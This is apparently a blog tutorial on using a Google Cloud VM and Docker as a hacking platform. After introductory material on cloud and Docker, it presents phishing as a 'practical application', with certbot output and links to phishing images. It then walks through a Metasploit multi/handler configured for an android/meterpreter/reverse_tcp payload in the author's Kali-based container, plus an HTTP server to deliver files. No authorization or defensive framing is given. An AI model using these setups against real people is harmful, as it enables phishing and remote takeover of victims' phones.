Is Cloud a Tool For Hackers ?

Using Cloud as a handy tool for exploitation.

Featured image

Description : Cloud Computing is a revolutionary technology. It has changed the deployment market alot resulting many companies switching to cloud ditching on-premise computational infrastructure now let’s see how a hacker uses this technology.

Hello Everyone welcome to the tutorial, We will be exploring the use of cloud computing in the field of cyber security. Cloud And Docker Combined has great importance and Huge applications but for our purpose we are just scratching the surface of it.

YouTube Video:




  1. What Is cloud ?
    • Understanding Cloud With its Applications and Advantages.
    • Making an account on Google Cloud Platform and using Free tier
    • Creating a Linux VM on Google Cloud Platform and Connecting to it via SSH
  2. What is docker ?
    • Understanding Docker With its Applications and Advantages.
    • Setting up Docker on Linux VM
    • Basic Usage (Pulling images and creating containers )
  3. Practical Application 1: Phishing
  4. Practical Application 2: Metasploit Framework
    • Method 1: Using Docker
    • Method 2: Using SSH ssh tunneling
  5. Conclusion
  6. Usefull links

What is Cloud ?

placeholder Cloud computing is the on-demand availability of computer system resources, especially data storage and computing power, without direct active management by the user. The term is generally used to describe data centers available to many users over the Internet.

Advantages of Cloud:

  1. Less Costs
  2. 24 X 7 Availability
  3. Flexibility in Capacity
  4. All over Functioning
  5. Automated Updates on Software
  6. Security
  7. Carbon Footprint
  8. Enhanced Collaboration
  9. Control on the Documents
  10. Easily Manageable

*Main Advantage for Hacker and Learners * : Users can create or delete Virtual Machines easily if you mess something in the system. This Process is very fast. Machines have fast internet connection you can download tools with that high speed internet. Most Cloud Providers provide a free tier to experiment the features.

Making an Account on Google Cloud Platform

Refer this article Learn how to create a Google Cloud Platform Account

Creating a Linux VM Istance and Connecting to it Via SSH

Refer this article Quickstart using a Linux VM

What is Docker ?

placeholder Docker is a set of platform as a service products that uses OS-level virtualization to deliver software in packages called containers. Containers are isolated from one another and bundle their own software, libraries and configuration files; they can communicate with each other through well-defined channels. placeholder placeholder

Advantages of Docker:

  1. Easy to use and setup applications on any machine
  2. Standardization & productivity
  3. CI efficiency
  4. Compatibility & maintainability
  5. Simplicity & faster configurations
  6. Rapid Deployment
  7. Continuous Deployment & Testing
  8. Multi-Cloud Platforms
  9. Isolation
  10. Security

Spotify Case study A digital music service with millions of users is running a microservices architecture with as many as 300 servers for every engineer on staff. The biggest pain point Spotify experienced managing such a large number of microservices was the deployment pipeline. With Docker, Spotify was able to pass the same container all the way through their CI/CD pipeline. From build to test to production, they were able to ensure that the container that passed the build and test process was the exact same container that was on production.

Now the company can guarantee that all of their services remain up and running, providing a great user experience for their customers. They also built a new platform called Helios based on Docker containers to deploy their containers across their entire fleet or servers. maintain their development ecosystem.

Setting up docker:

Setting up Docker on is quite easy you need to just run install script and relax

curl -fsSL -o ## download script 
sudo sh ## run the script
sudo docker run hello-world ## to check docker is working


harsh@instance-1:~$ sudo docker run hello-world
Unable to find image 'hello-world:latest' locally
latest: Pulling from library/hello-world
0e03bdcc26d7: Pull complete 
Digest: sha256:8e3114318a995a1ee497790535e7b88365222a21771ae7e53687ad76563e8e76
Status: Downloaded newer image for hello-world:latest

Hello from Docker!
This message shows that your installation appears to be working correctly.

To generate this message, Docker took the following steps:
 1. The Docker client contacted the Docker daemon.
 2. The Docker daemon pulled the "hello-world" image from the Docker Hub.
 3. The Docker daemon created a new container from that image which runs the
    executable that produces the output you are currently reading.
 4. The Docker daemon streamed that output to the Docker client, which sent it
    to your terminal.

To try something more ambitious, you can run an Ubuntu container with:
 $ docker run -it ubuntu bash

Share images, automate workflows, and more with a free Docker ID:

For more examples and ideas, visit:


Basic Usage

sudo docker run -t debian ## to make a container and directly get its shell use flag --rm to automatically delete comtainer when it stops 
sudo docker ps ## ro view running containers
sudo docker container ls -a ## view stored container information
sudo docker images # view downloaded image 
sudo docker pull <image name> # download image from docker hub
sudo docker run -d -t --name <container name>  -p 80:80 <image name> # to create a container with port 80 linked to localhost add more ports using -p flag  
sudo docker exec -it <container name > <command> # to get into the container shell
sudo docker start/stop <containe name>/<container id>

For more info on basic usage read this guide

Practical Application 1: Phishing

Phishing is a cybercrime in which a target or targets are contacted by email, telephone or text message by someone posing as a legitimate institution to lure individuals into providing sensitive data such as personally identifiable information, banking and credit card details, and passwords.

Now here we go with the practical usage

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Congratulations! You have successfully enabled

You should test your configuration at:
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
 - Congratulations! Your certificate and chain have been saved at:
   Your key file has been saved at:
   Your cert will expire on 2020-08-01. To obtain a new or tweaked
   version of this certificate in the future, simply run certbot again
   with the "certonly" option. To non-interactively renew *all* of
   your certificates, run "certbot renew"
 - If you like Certbot, please consider supporting our work by:

   Donating to ISRG / Let's Encrypt:
   Donating to EFF:          

List of available sites

Practical Application 2: Metasploit Framework

The Metasploit Project is a computer security project that provides information about security vulnerabilities and aids in penetration testing and IDS signature development. It is owned by Boston, Massachusetts-based security company Rapid7

sudo docker pull insomniaccoder/hackercloud
## stop previous containers that use same ports before making new one
sudo docker run -d -it --name hackercloud -p 80:80 -p 5000:5000 insomniaccoder/hackercloud # I have made this image myself for you guys port 80 for http server and 5000 for msf
# this docker image is buid on kali linux and I have installed msf-framework and other required tools already To run it instantly
sudo docker exec -it hackercloud bash
sudo docker exec -it hackercloud bash
service postgresql restart 
msfdb reinit
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set PAYLOAD android/meterpreter/reverse_tcp
PAYLOAD => android/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST
msf5 exploit(multi/handler) > set LPORT 5000
LPORT => 5000
msf5 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 
sudo docker exec -it hackercloud bash
python -m SimpleHTTPServer 80

Alternative Method : Using SSH ssh tunneling (little Slow)

SSH tunneling or SSH port forwarding is a method of creating an encrypted SSH connection between a client and a server machine through which services ports can be relayed. placeholder

SSH forwarding is useful for transporting network data of services that uses an unencrypted protocol, such as VNC or FTP, accessing geo-restricted content or bypassing intermediate firewalls. Basically, you can forward any TCP port and tunnel the traffic over a secure SSH connection.

There are three types of SSH port forwarding:

For our purpose we will need SSH Remote Port Forwarding Syntax : ssh -R [REMOTE:]REMOTE_PORT:DESTINATION:DESTINATION_PORT [USER@]SSH_SERVER The options used are as follows:

Using msf on Your Computer with SSH Remote Port Forwarding:


Lowell McAdam, CEO of Verizon says, “Cloud computing is the third wave of the digital revolution.” Technically, it is supposed to be a better way to run a business. It has changed the way the business data is stored and accessed. The buzzword cloud computing came into existence in the year 2006. It has proved to be a stepping-stone for various industries ranging from gaming to small enterprises. Customer experience is of utmost importance in this digital era to define the success of a business. Cloud computing has transformed organisations by allowing them to leverage technologies like big data analytics, internet of things, etc. Despite of all the mentioned industrial uses of cloud computing I has made thorugh a easy goto tool for hacking.

Usefull links

  1. My Github profile
  2. Docker Hub Repository
  3. Instagram
  4. My Youtube Channel
  5. phishing Docker hub Repository
  6. hackercloud Docker Hub Repository